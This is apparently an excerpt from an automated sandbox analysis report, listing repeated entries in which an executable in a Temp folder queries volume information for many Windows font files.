                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
